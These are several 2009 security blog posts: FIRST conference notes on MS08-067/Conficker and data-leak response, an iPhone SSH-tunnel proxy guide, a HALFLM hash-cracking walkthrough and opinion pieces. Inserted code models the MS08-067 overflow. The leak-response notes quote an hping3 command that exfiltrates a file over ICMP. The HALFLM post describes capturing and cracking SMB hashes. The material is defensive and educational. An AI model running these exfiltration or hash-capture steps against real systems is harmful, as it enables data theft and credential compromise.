A lot of effort is put into the testing phase to ensure that the patch deals with the issue, doesn’t create other issues (security or non-security related), and is compatible with other products.

Microsoft release day means staff getting in at 6am to monitor the process and make sure everything runs smoothly.

MS08-067 (October 2008)

  • Vulnerability found in Windows Server Service (netapi32.dll)
  • Wormable
  • Large install base
  • Exploit and limited attacks known; widespread malware probable

This vulnerability was discovered through the customer support services department. A specific crash was reported by a customer who was experiencing issues. It was originally thought to be another attack attempt against the flaw originally patched in MS08-040. During further research it was found to be a separate vulnerability.

The vulnerable function is the ConvertPathMacros function.

  • Exposed via anonymous RPC endpoint
  • Replaces path macros (\..\ and \.\)
    • Normal usage \foo\bar\..\bas -> \foo\bas
    • Normal usage \foo\bar\.\bas -> \foo\bas
  • Vulnerable usage \a\..\..\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This attack string forces ConvertPathMacros to look back into the stack for the previous slash. Some pre-staging of the attack must be made to trigger the exploit.
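To make the bug class in these notes concrete, here is an added example (my code, not the presenter’s or Microsoft’s) that models the macro collapse in Python with C-style read/write indexes over a bytearray standing in for the stack. The `bounded` flag switches between the unsafe backward scan and the fixed version that refuses to look below the start of the buffer. The 16 bytes placed before the path and the separator planted among them are a constructed stand-in for the pre-staging mentioned above.

```python
"""Added example (not code from the talk or from Microsoft): a model of the
path-macro bug described above, with the bounded version beside it.

A bytearray stands in for the stack: the path lives at mem[start:start+length]
and the bytes below `start` play the role of whatever the stack held before the
buffer. Explicit read/write indexes mimic a C implementation; the separator
planted in the "stack" bytes is a constructed stand-in for the pre-staging the
notes mention.
"""
BS, DOT = ord("\\"), ord(".")


def collapse_path_macros(mem: bytearray, start: int, length: int, bounded: bool) -> int:
    """Collapse '\\.\\' and '\\..\\' in mem[start:start+length] in place.
    Returns the new length, or -1 when `bounded` is set and a '\\..' would
    have to search for a separator below the start of the buffer."""
    end = start + length
    r = w = start                      # read index, write index
    while r < end:
        is_dot = mem[r] == BS and r + 1 < end and mem[r + 1] == DOT
        if is_dot and r + 2 < end and mem[r + 2] == DOT and (r + 3 == end or mem[r + 3] == BS):
            # "\..": drop the previous component by scanning backwards from the
            # last byte written to the separator that introduced it.
            j = w - 1
            floor = start if bounded else 0
            while j >= floor and mem[j] != BS:
                j -= 1
            if j < start:
                if bounded:
                    return -1          # hardened: refuse to look outside the buffer
                j = max(j, 0)          # unbounded: accept whatever the "stack" held
            w = j                      # may now sit below `start` in the unbounded case
            r += 3
        elif is_dot and (r + 2 == end or mem[r + 2] == BS):
            r += 2                     # "\.": drop the macro itself, keep the rest
        else:
            mem[w] = mem[r]            # ordinary byte: copy it to the write position
            w += 1
            r += 1
    return w - start


def canonicalize(path: str, bounded: bool = True):
    """Convenience wrapper over a stand-alone buffer; None means rejected."""
    mem = bytearray(path.encode())
    n = collapse_path_macros(mem, 0, len(mem), bounded)
    return None if n < 0 else mem[:n].decode()


def stack_model(bounded: bool):
    """Place the attack string from the notes after 16 bytes of other stack
    data (constructed) and return (result_length, stack_bytes_below_buffer).
    Unbounded, the second '\\..' finds the planted separator at offset 4 and the
    bytes that follow are then written below the buffer; bounded, it is rejected."""
    below = bytearray(b"XXXX\\" + b"Y" * 11)          # 16 bytes "below" the path
    attack = b"\\a\\..\\..\\" + b"A" * 16
    mem = below + attack
    n = collapse_path_macros(mem, len(below), len(attack), bounded)
    return n, bytes(mem[:len(below)])


if __name__ == "__main__":
    print(canonicalize(r"\foo\bar\..\bas"))
    print(canonicalize(r"\a\..\..\AAAA"))
    print(stack_model(bounded=False))   # stack bytes below the buffer overwritten
    print(stack_model(bounded=True))    # rejected, stack bytes untouched
```

The unbounded run shows what a missing lower bound on the scan buys: a read below the buffer becomes a write below it, because the write index is reset to wherever the scan stopped. The bounded version simply treats a `\..` that would climb above the buffer start as a bad path, which is the only sane answer for a canonicaliser.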

By using fuzzing it was possible to trigger the vulnerability and search for possible variations of the attack. Microsoft didn’t want to fix netapi32.dll again (after already fixing it in MS06-040 and MS06-070). So all cases were tested to make sure it was done right.

MAPP partners were provided with packet captures, safe PoC, technical description, information about the malware currently exploiting the vulnerability, stack traces.

Through the security bulletin customers were given workarounds – Block SMB, Stop services, Vista\WS08 RPC firewall rule to block UUID, Chacl tool to change named pipe ACL

Response Timeline .:

Oct 6th – Received notification of vulnerability
Oct 6th – Reproduced vulnerability on reported platform (XP SP2)
Oct 6th-10th – Begin testing other affected platforms
Oct 10th-22nd – Fix developed and core baseline of testing completed (due to out-of-band release)
Oct 23rd – Patch pushed out through all update platforms (WSUS, Windows Updates, etc…)

The process of releasing this patch was compressed from a 2 month process into a 17 day process due to the severity. Despite this work, customers complained about the patch coming out-of-band. Microsoft rarely release out-of-band patches (In 2008 Microsoft only released 2 out-of-band patches).

Analysis showed that malware was exploiting this flaw beginning on 13/08/2008 – These were targeted attacks designed to drop TrojanSpy:Win32/Gimmiv onto the system. Data was then collected and sent to a server in Japan. Detection for Gimmiv was added into the MSRT tool in November.

After the patch was released more trojans began to use the exploit (Trojan:Win32/Wecorl, Trojan:Win32/Clort). The first worm using this exploit (Conficker) was seen on 21st November. The code used in Conficker didn’t appear to be linked to the earlier team who developed Wecorl/Clort.

The name Conficker was from a string found while Microsoft analyzed the original variant (Traffic-converter.biz).

Conficker B was less about exploiting vulnerabilities and more about testing company best practices (weak passwords, autorun, local administrative permissions, etc…)

Comparison between the various versions of Conficker.

  • Variant A – Spread only through the MS08-067 exploit
  • Variant B – Began to brute-force network shares, infecting network/removable drives, and using scheduled tasks to run the worm on remote machines.
  • Variant C – No new infection methods – Added P2P communications
  • Variant D – No infection required – distributed as an update to previously infected systems (B and C variants)
  • Variant E – No infection required – distributed as an update to previously infected systems (B, C and D variants)

It’s impossible for one vendor to do everything alone. Collaboration across the industry is vital in fighting people who distribute malware.

Around 100 people at Microsoft worked on the MS08-067 / Conficker problem between all phases of the incident. This raises an issue of scalability. If multiple issues like Conficker hit at the same time, then there may be problems handling the load (as yet untested).

16:00 INTERPOL Initiatives to Enhance Cyber Security – Vincent Danjean

Interpol was created in 1923 and is the world’s largest international police organisation with 187 member countries.

There were a lot of statistics and information presented on success stories. I’d suggest taking a look at the slides as there is very little point in me reprinting the statistics and facts. The information is a little dry however. So you have been warned ;)

Well that’s the end of day 2. It’s been another long day. Time for that beer…

I managed to have a long chat with Sherri Davidoff and Johnathon Ham today after the client-side attack workshop. Johnathon managed to finish the first exercise within a few minutes while most of us were still looking for the right PCAP file. His strategy for the analysis was so straightforward, but very effective for quick analysis of captures. I always enjoy talking to people smarter than me (it happens a lot) as I get to learn something new. I’m looking forward to Sherri’s talk at Defcon as well. It sounds like it’ll be really interesting.

Tonight is the vendor showcase. Normally I shy away from that kind of marketing event, but they have beer ;) Tomorrow I’ll be attending the volatility workshop held by Andreas Schuster (it’s going to be a day of fun playing in memory). So the blog might be a little short tomorrow. Maybe that’s a good thing though. I talk too much…


21st FIRST Conference – Day 1

Posted by ChrisJohnRiley on June 29, 2009

Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note, this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more on Incident Response and Handling than my usual attack vectors stuff, but so far it’s been a great experience. Hope you enjoy the write-up.

DAY 1

09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi

I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (and why the food was much better here in Kyoto than in Tokyo) the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.

Economic Crisis / time of “less”

The initial focus was on the use of technology in Japan to automate and streamline services such as speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking/distribution management (to automate shipping of stock to locations depending on demand) and water control/flow management. The use of technology is also now working its way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses, not just large multi-nationals, but also the smaller businesses are becoming more reliant on these systems for everyday business purposes.

“perimeter protection model” doesn’t work anymore

With the increase in outsourcing, ASP, SaaS and cloud computing the perimeter is much more fluid and undefined. Services are now from entities in other countries. Different rules, laws and standards.

Risks have changed dramatically

  • Quality and Quantity of “attacks”
  • Economic damages
  • Who is attacking / being attacked

“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)

Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:

  • More preparedness
  • More scientific approach
  • Share risk between business and government

The economic crisis has caused costs to be cut in various ways. Less investment in information systems (including information security management). Slow down of innovations, upgrades and improvements. As the headcount lowers, companies are unable to innovate and adapt as easily as before.

Mission impossible for system operators. Lower budgets, less staff and increase in security incidents (rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes. BYO – Using personal laptops for business uses. Based on virtualization or thin-client solutions. Reduces costs and can help improve security.

Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)

Use of visualization in comparing attack traffic to normal traffic. By using this technique it is easy to see portscans, DoS attempts and a variety of other attack types visually and in real-time. Helps to streamline information management in a time when less needs to do more.

Invisible computers a growing risk. Electronics that are not traditional computers, but operate on the TCP/IP networks (HD-Recorders, Set-Top boxes, etc….) These systems are more vulnerable and open to abuse. Attacks routed through these devices have started to be seen in the wild in Japan.

13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham

Scenario: Attacker has physical access

Attacker Profile: Staff member, cleaning staff, security guards, etc…

Spybase Wireless Keylogger ($285 Amazon)

  • Install once and access through wireless to download the data
  • Staff are unaware/untrained on what to check for on a system to check for a keylogger

Questions to ask in a response scenario

  • How long has the keylogger been installed ?
  • Who planted it ?
  • What information has been exposed ?
  • What other systems could be exposed ?

Keyloggers have serial numbers, many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed. Often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.

USB devices come in many different formats. Pens, wristbands, iPods, Sushi (yes, as seen in Johnny Long’s presentation), and many different places to hide things like micro-SD. Ironkey have a professional USB that supports remote wipe. If you recover this kind of USB in an incident response, store it in a suitable bag to block incoming wipe commands.

Sherri performed a live demo that demonstrated how easy it is to download data from a system to a phone connected through USB. By using encryption and deleting the key after encryption it is possible to prevent a responder identifying what data was copied.

In physical access cases .:

  • Monitor account/system usage
  • Preserve evidence / chain of custody
  • Determine type of affected data
  • Contact legal advisers
  • Lockout / monitor (depending on situation)
  • Identify systems that could also be exposed

Scenario: Attacker Logical Access

Use of covert channels to exfiltrate the data without triggering defenses

Examples of covert channels :

  • ICMP Echo Request Tunneling (Loki)
    • Implemented using HPING3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com
    • Capture using TCPDUMP

Hard to track where the data is going (ICMP to a nonexistent domain). Attacker must be somewhere in the line to capture the data using TCPDUMP. Open in Wireshark and then carve out the file.

How to protect against this ?

  • Track the data export at the database
  • Log commands run on servers / applications installed on servers
  • Should this server be sending Echo Requests ? Block and Log
  • Watch for proprietary data on the wire (in cleartext)
    • Using RegEx to detect set data
    • Implement using something like SNORT

Use Honeytokens to trigger alerts. Insert dummy records into the database (that should never be returned unless the whole table is dumped), files with seemingly interesting data (passwords.xls) which are present in a non-browsable area of your website. Insert code-comments into the source-code of your internally developed applications and create rules to alert/block traffic leaving your network with these comments.

Doesn’t prevent exposure, doesn’t provide the depth of the issue, however the first piece of the puzzle is being aware that something bad is happening.

Issues: Encryption of the data will prevent this honeytoken being tracked.

Solution: Frequency analysis – Detect the frequency of hex values to discover if the data is encrypted. Search and alert on encrypted data where it is not part of the normal traffic pattern. Entropy-based anomaly detection through the SNORT platform. No plugin yet for this purpose. Stay tuned…

Last point of recovery process needs to be an improved preventative posture. Lessons learned.

What we’ve learned :

  • Think like an evil insider
  • Log everything possible to improve the scoping of the breach

14:30 Using Social Media in Incident Response – Martin McKeay

Staff / Responders that use social media are releasing information live as it comes in. Due to the fact this is a live response, it can often be more about emotion than about fact. Company policy for electronic media (including social media) isn’t set in a majority of companies. Those that do have a policy do not always enforce the policy, or make staff aware of their responsibilities.

Companies are slow to come to social networking and are seeing issue when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc… ? Incidents of non-staff taking the name of companies and using it to communicate as if they are the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to be a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.

Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. The AT&T outage can be used as a good example. In the case of AT&T, many users on Twitter were mapping out the areas suffering a connection outage although AT&T didn’t talk about the issue openly. This has caused damage to AT&T’s reputation.

Key points .:

  • Assign person who will communicate
  • Policy on what to communicate
  • Who is dealing with Blogosphere / Social Media

16:30 Emerging Threats and Attack Trends – Paul Oxman

Threats are moving up the stack towards targeting individuals.

Designer malcode is now being developed using bleeding edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup malcode is being made available to customers in order to replace the original once AV vendors catch up and start detecting the attack code.

Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.

Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.

2008 Security

  • 70% of the top 100 websites pointed to (or contained) malware
  • Number of vulnerabilities up 11% from 2007
  • Reputation HiJacking on the increase
  • Attacks are more targeted to help maximize effectiveness
  • More reliance on blended threats

Issues of hardware being infected at “source” to catch consumers off guard. A user is more likely to accept an install request when they plug in a new device (i.e. digital photo-frame).

Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.

July 2008 – 45% of browsers still vulnerable despite auto-update features.

Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.

Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit known issues.

Case study of how the creators of conficker evolved their attack by updating from MD5 to MD6 and then patching a flaw in MD6 when it was found to be vulnerable. 85% of code was replaced from 1 version to another. Not your average malware.

Threats on the horizon:

  • SMS vishing
  • Extensive social engineering
  • More highly targeted attacks
  • Attacks on mobile devices (different OS an issue for attackers)
  • Using video sharing sites as a method for distribution of malware

Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).

Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2 ;)


Protecting your browsing with iPhone SSH tunnels

Posted by ChrisJohnRiley on June 21, 2009

Most of the time I feel relatively secure when I’m browsing the web or checking twitter on my iPhone. That said, I rarely use the built in wireless for these purposes, and rely instead on the reasonably good 3G network in Austria. When I’m out of the country I usually try to buy a pay-as-you-go sim card and pay for the daily data transfer. This isn’t as expensive as you’d think. For example in the Netherlands it costs around €3.50 per day of data transfer. Not cheap if you’re using it long-term, but if you’re only there for a couple of days it’s a lot cheaper than paying for a hotel WLAN that’s insecure and only works inside the hotel. Still, this solution doesn’t work everywhere and isn’t for everyone. The fallback is to use whatever wireless you can find, insecure or not. This is something I’ve been fighting with for a while now. Stemming (mostly) from my unwillingness to setup a VPN server (my home ADSL isn’t good enough quality, and doesn’t have a fixed IP) or pay a huge price for a VPN solution through my existing hosting provider (thanks for the cheap hosting Dreamhost).

The iPhone (at least version 2.2.1) supports the use of HTTP proxies when connecting via a wireless connection. This is great. Surely I can setup an SSH Tunnel to my server and tell the iPhone to use this as a SOCKS proxy. As with everything on the iPhone however, simple always turns into complicated very quickly. I experimented with this solution and found that the HTTP proxy support was really just that, HTTP proxy support and nothing else. So back to the drawing board. I searched for another solution and settled on using the 3proxy application (in cydia for those lucky enough to have a jailbroken iPhone) to setup a local HTTP proxy.

A few requirements to get this up and running on your iPhone.

  • A Jailbroken iPhone (or iPod Touch)
  • SSH Client installed
  • 3proxy (available in cydia)
  • terminal application
  • An SSH server (setup for either password or certificate access)
  • Backgrounder (or some other way to run commands and have them running in the background)
  • OPTIONAL: iFile (easy file editing)

Starting off we’ll take a look at the configuration of 3proxy. By using the following configuration you tell 3proxy to forward all traffic to a second proxy server, this time a SOCKS proxy (in this case my SSH tunnel).

#!/usr/bin/3proxy
daemon
auth iponly
log /var/log/3proxy.log D
rotate 5
fakeresolve
internal 127.0.0.1
allow * * 127.0.0.1
parent 1000 socks5+ 127.0.0.1 8081
proxy -p8080 -a -i127.0.0.1

The quick rundown on the above configuration.

  • #!/usr/bin/3proxy – Tells the script what interpreter program to use
  • daemon – Tells 3proxy to run as a background process
  • auth iponly – sets the authorization to be ip restricted
  • log – Setup a log that rotates daily (the D option)
  • rotate 5 – Sets the number of log files to keep before rotating
  • fakeresolve – Tells 3proxy to route DNS lookups through the proxy
  • internal – Listen on the internal interface only
  • allow – Currently set to * for all (you can limit this by username/password or IP, however this caused issues in testing)
  • parent – This is where we’re setting the next proxy in the chain (1000 is always use this parent, SOCKS5+ is the type and then the SSH tunnel listening ip and port)
  • proxy – this final command tells 3proxy to start a proxy on port 8080 using anonymous proxy mode (-a) and listen only in internal loopback

You can find more configuration information on the 3proxy website. Although leaving the allow set to * (all) is a concern, remember that the proxy is only listening on the localhost address and from outside the port is blocked.

[Screenshot: port scan of the iPhone from outside]

Now that we’ve got the 3proxy.cfg file saved (mine’s stored in /usr/bin with the 3proxy executable) you’ll need to run chmod +x to make it executable. Next up is the SSH Tunnel, and doing this on an iPhone isn’t much different to a normal linux system (just harder to type for obvious reasons). I opted to add a certificate for quick easy access and restricted access to the certificate to the root user on the iPhone (you have changed your root password right ???). I added the private key to ~/.ssh/id_dsa (or id_rsa, your choice) and setup a bash script to kick off the SSH tunnel (typing that command each time gets boring fast).

ssh -D 8081 -N -C username@remotehost.your.domain -2 -p 64000 -i /home/root/.ssh/id_dsa

The above command is a simple SSH tunnel setup to connect to port 64000 on remotehost.your.domain and logon as the user username using the certificate file stored in /home/root/.ssh/id_dsa. It will then setup a local listener on port 8081 and dynamically route all traffic coming to this port through the SSH tunnel. As we’re treating the tunnel as a SOCKS proxy we don’t need to have anything else setup at the other end (no other proxy server waiting to route the requests) although you could setup privoxy or any other kind of proxy if you wanted more control.

So, now that we have the two parts of our configuration ready we just need to drop to the shell and kickoff the SSH Tunnel (using your bash script), and then startup the 3proxy using the /usr/bin/3proxy.cfg command. I’ve linked it all into a single bash script to make things a little quicker.
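Here is an added example (not the author’s script) of how I would link the two parts together in Python rather than a bash script, using the post’s own ssh options and /usr/bin/3proxy.cfg. It starts 3proxy once (the cfg’s daemon line backgrounds it), then loops: launch the ssh SOCKS tunnel, wait until port 8081 is actually accepting connections before counting it as up, and when ssh exits, back off and restart it. The ServerAlive and ExitOnForwardFailure options are my additions so a dead link makes ssh exit instead of hanging; hostname, port, user and key path are the placeholders from the post, and killall for tear-down is assumed to be available on the device.

```python
"""Added example (not from the post): a small supervisor that does the
build-up the post describes by hand, and keeps the tunnel alive.

It starts 3proxy once via the /usr/bin/3proxy.cfg script from the post, then
loops: start the ssh SOCKS tunnel with the post's options, wait until port 8081
is actually listening, and when ssh exits (network change, screen lock) restart
it with a capped back-off. The ssh keep-alive options are an addition so a dead
connection makes ssh exit instead of hanging; the hostname, port and key path
are the placeholders from the post.
"""
import socket
import subprocess
import time

SOCKS_PORT = 8081
PROXY_SCRIPT = "/usr/bin/3proxy.cfg"        # executable config, as in the post
SSH_CMD = [
    "ssh", "-D", str(SOCKS_PORT), "-N", "-C", "username@remotehost.your.domain",
    "-2", "-p", "64000", "-i", "/home/root/.ssh/id_dsa",
    "-o", "ExitOnForwardFailure=yes",        # fail fast if 8081 cannot be bound
    "-o", "ServerAliveInterval=15",          # notice a dead link within ~45 s ...
    "-o", "ServerAliveCountMax=3",           # ... and exit so the loop restarts us
]


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True when something accepts TCP connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def wait_for_port(host: str, port: int, deadline_s: float, poll_s: float = 0.2) -> bool:
    """Poll until the port accepts connections or the deadline passes."""
    end = time.monotonic() + deadline_s
    while True:
        if port_open(host, port):
            return True
        if time.monotonic() >= end:
            return False
        time.sleep(poll_s)


def backoff_delay(failures: int, base_s: float = 2.0, cap_s: float = 60.0) -> float:
    """Exponential back-off between restart attempts: 2, 4, 8, ... capped at 60 s."""
    return min(cap_s, base_s * (2 ** failures))


def open_test_listener():
    """Loopback listener used to exercise wait_for_port without ssh (constructed)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def supervise(max_restarts=None):
    """Start 3proxy, then keep the ssh tunnel up until interrupted."""
    subprocess.Popen([PROXY_SCRIPT])            # 'daemon' in the cfg backgrounds it
    failures = 0
    restarts = 0
    while max_restarts is None or restarts <= max_restarts:
        ssh = subprocess.Popen(SSH_CMD)
        if wait_for_port("127.0.0.1", SOCKS_PORT, deadline_s=20):
            failures = 0
            ssh.wait()                          # blocks while the tunnel is healthy
        else:
            ssh.terminate()                     # never came up: count it as a failure
            ssh.wait()
            failures += 1
        restarts += 1
        time.sleep(backoff_delay(failures))


if __name__ == "__main__":
    try:
        supervise()
    except KeyboardInterrupt:
        subprocess.run(["killall", "3proxy"])   # tear-down; killall assumed available
```

3proxy never needs restarting here: it only connects to 127.0.0.1:8081 per request, so a tunnel that comes back on the same port is picked up transparently. Waiting for the port before trusting the tunnel matters because ssh prints nothing useful on success and the apps will happily fall back to direct connections if the proxy is not listening yet.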

In testing Safari works pretty well (minor decrease in performance as you’d expect). Twitterfon was the second application I tested. Although this follows the HTTP proxy rule, it still insists on doing DNS lookups for advertising outside of the proxy. This is also the case for a couple of other applications. Mail doesn’t follow the HTTP rules, however you can easily setup additional 3proxy ports for these, or use SSL and make sure your DNS is all piped over the local listener and through the SSH tunnel (3proxy supports a DNS caching proxy, tcp and udp forwarding proxies also).

[Screenshots: Safari No Proxy, Twitterfon No Proxy, Twitterfon Through Proxy]

Supported:

  • Safari
  • Twitterfon (partially: Advert DNS lookups are still a possible concern/attack vector)
  • Cydia
  • AppStore
  • iTunes
  • Youtube
  • Weather
  • GRiS
  • WordPress (partially: As with the Twitterfon issue, the DNS appears to ignore the HTTP proxy settings)

Obviously these were just the applications I tested. I’d suggest running your own tests to ensure that you’re seeing the same results.

Not-Supported:

  • Mail (setup a port forwarder to achieve support for email)
  • Siphon (This is a real disappointment)
  • F-Stream
  • … probably more, so your mileage may vary

If you test any other applications please let me know and I’ll add it to my list.

Once you’ve finished using the SSH Tunnel and proxy, remember to kill -9 them using the console.

TODO:

  • Test with alternative “allow” settings to restrict access further (username/password too easy)
  • Prevent initial DNS lookup on SSH Tunnel (i.e. dyndns service)
  • Log Bug with Twitterfon regarding DNS lookups
  • Find an easier way to trigger the tunnel & 3proxy build-up/tear-down
  • Resolve issue of tunnel disconnecting when screen gets locked (FOR loop ???)
  • Use the tunnel for 3G connections (paranoid much !!!)


EC-Council Courses certified by the NSA !!!

Posted by ChrisJohnRiley on June 6, 2009

Yes, this isn’t a mistake, and I’ve not been drinking. I received a nice email from the people at EC-Council letting me know that the “EC-Council Courseware certified to have met the CNSS Standards by the United States National Security Agency (NSA) and the Committee on National Security Systems (CNSS)”. The press release goes on to detail the EC-Council courses (including CEH, ECSA and LPT) that have been certified to meet the training requirements for information security professionals in federal government.

My first reaction was that this must be some kind of scam. I was waiting for the part where they ask me for my credit-card number so I can receive a new certificate and security level. Alas, this was not to be. Those who’ve read my blog or my articles know that my view on EC-Council and in particular their CEH, ECSA/LPT track isn’t a good one. I’ve been through the training and to this date (maybe for not much longer) I’m still certified as a CEH and ECSA. I’ve refused to pay the $500 a year required to be an LPT however, as, well, it’s a farce. Still, back to the point. I’m not sure what changes EC-Council have made since my experiences with version 5 of the CEH course, but from what I’ve heard and read, they’ve only increased the size of the course and done nothing to improve the low quality of the training and material.

I’m not sure what the thinking behind this certification was, however I’d love to hear your opinions. Does this change your view on the quality of CEH candidates ? or has it just lowered your opinion of the technical competence of the NSA. I know where my feelings on the matter lie.

EC-Council Press Release –> HERE


Cracking HALFLM

Posted by ChrisJohnRiley on June 2, 2009

I was recently reading through Chris Gates post on capturing and cracking HALFLM hashes with Metasploit and thought I’d give it a quick run through. (I won’t be rehashing what Chris already covered here, so I suggest you pop over to his blog for a quick coverage of HALFLM and the rainbowtable cracking method).

Until I read the post I’d been using the SMB_relay attack to load up a meterpreter shell onto the remote target, but seeing as Microsoft have finally decided this is a bug worth patching, it’s time to move on to other attack vectors. SMB_relay will still be a good attack vector for some attacks, but the patch against reflective relays means it’s not going to always be available.

All was going well with the walkthrough, I’d captured the hash from the target machine and had the HALFLM tables downloaded (halflmchall _alphanumeric #1-7_x_2400_ 1122334455667788). So after running rcracki_mt_0.5.exe *.rti -h <First16Chars> I was depressed to see that the first half wasn’t found (the tables are only alphanumeric after all). Not a problem I thought, and went back to Chris’ walkthrough to see the next step. That’s where it all went wrong. If you can’t find the first part of the hash, then the rest of the walkthrough isn’t going to help. I had a little hunt around the big WWW and like any good Googler I found some hints on what other tools could do a brute force or password guessing attack against the HALFLM format. I picked CAIN and set about trying to manually tell it what the username, LM hash and challenge were, without much luck. Cain can sometimes be stubborn on the input formats and you can’t manually tell it what should go where. I went back to the Metasploit smb capture module and had a closer look at the set options to see what I could do. Here I found the option to output the captured hashes straight into a format readable by Cain&Abel (set PWFILE cain_hashdump.txt) instead of to the screen in a generic format.

After performing the SMB capture again, the file cain_hashdump.txt was created, allowing me to directly import it into CAIN (along with the challenge this time).

For those that may have already captured the HALFLM hash and need to import this into CAIN, the format of the dump output from Metasploit is as follows .:

USERNAME:DOMAIN:1122334455667788:LMHASH:NTHASH


The 1122334455667788 in the middle tells Cain what challenge was used by the Metasploit module. In this case Metasploit is hard coded to use \x11\x22\x33\x44\x55\x66\x77\x88 as the challenge string.

Hope you find this useful, and remember to check out the Carnal0wnage blog for the RainbowTable method, as well as lots of other Metasploit hints, tips and examples.


One bad day

Posted by ChrisJohnRiley on May 30, 2009

I must admit that I don’t follow this kind of news as much as some others in the industry. However I recently became aware of the ongoing legal action by Merrick Bank against the IT consulting firm Savvis for negligence and negligent misrepresentation in certifying CardSystems as CISP compliant. This in itself wouldn’t be important news in my view as companies seem to sue each other at the drop of a hat in this day and age. However the details of the case interested me enough to read a little further.

The case came back into the limelight in the past few weeks after the federal district court in Missouri transferred the case to Arizona. To give the brief 30-second overview, Savvis was retained by CardSystems in 2004 to validate their systems as CISP (Cardholder Information Security Program*) compliant. Less than a year after being given the green light by Savvis, CardSystems was breached resulting in the compromise of up to 40 Million credit card numbers. This in turn cost Merrick Bank (a customer of CardSystems) over $16 Million in costs. Not a small amount by any means.

However, this is all in the past, and there are various places on the web where you can find much more in-depth information about the breach and the case. What I want to talk about is the validity of security checks and compliance. I’m a supporter of anything that convinces management to think about security. The debate about whether the PCI standard has helped or hindered security is something I’ll leave for the people who like to argue such things. However like any security check, penetration test, vulnerability scan or audit, the results (and therefore the compliance stamp that goes with it) are only going to tell you what the security was like at a single point in time. Having regular checks can help you build a view of your security over a longer period, but you can never say 100% what the company’s exposure was between two of those time-points.

I’ll give you an example. If company ABC requests a penetration test of their systems, the people performing the test (XYZ Labs) can only check for known issues, configuration flaws, business logic flaws, published vulnerabilities, and sometimes unpublished vulnerabilities. Even if the company requests that XYZ Labs perform a regular test every 3 months they can never be sure that between penetration tests they remain 100% secure. It comes down to the simple fact that defending a network is much harder than attacking one. It’s a simple equation. To defend your systems you need to make sure that every system in that network (or that could be attached to that network) is fully protected, patched, properly configured and monitored 24 hours a day, 7 days a week, 365 days a year. For an attacker to win, they simply need to find a single system on the network that has a weakness. That could be a configuration problem, an unpublished exploit (zero-day), or a weak link (social engineering, client-side attack, test system exposed to the internet). The possible attack vectors are wide and varied. They are also not all covered by the standard scanning techniques used by most Approved Scanning Vendors.

How does this fit with Savvis, CardSystems and Merrick Bank? It’s simple. Like any other IT Consultancy, Savvis were paid to come in and review security with CISP compliance in mind. They performed that action, certified CardSystems according to the standard and moved on. Savvis were not charged with maintaining the ongoing level of security at CardSystems in a hands-on role. So does this mean that Savvis are now responsible for any future security blunder made by the IT staff at CardSystems? They may, or may not, have been charged with scanning the network on a quarterly basis. However as anybody who’s compared a vulnerability scan to a Penetration test knows, scanning is only part of the battle. I’m not aware of any company doing compliance checks that offers a 12 month money back guarantee on your company’s security. How could they? After all, their security checks both on the audit side, as well as vulnerability scanning or penetration testing (if performed) can only show the current state of security within that organisation. If CardSystems was like any other company, they probably even worked especially hard during the Audit periods to improve the level of security and follow the processes exactly as they should. Showing their ‘A’ game to make sure that the compliance went smoothly. Some would say that a company will never be as compliant as it is during the Audit because of this very reason. It’s easy when nobody is looking over your shoulder to fall back into bad habits. I’ll do that change control tomorrow, it’s only a test box so no need to patch it as often. We’ve all done that at one time or another through laziness or pressure from management to fit in too much work before the long weekend.

I’m not a lawyer, and I don’t play one on television either (although I am available to audition should the right role come up). However I hate to see companies, like Savvis, get blamed for something that they could well have no control over. Then again, maybe the evidence in the case proves that Savvis is to blame. I can only go on the little information I have.

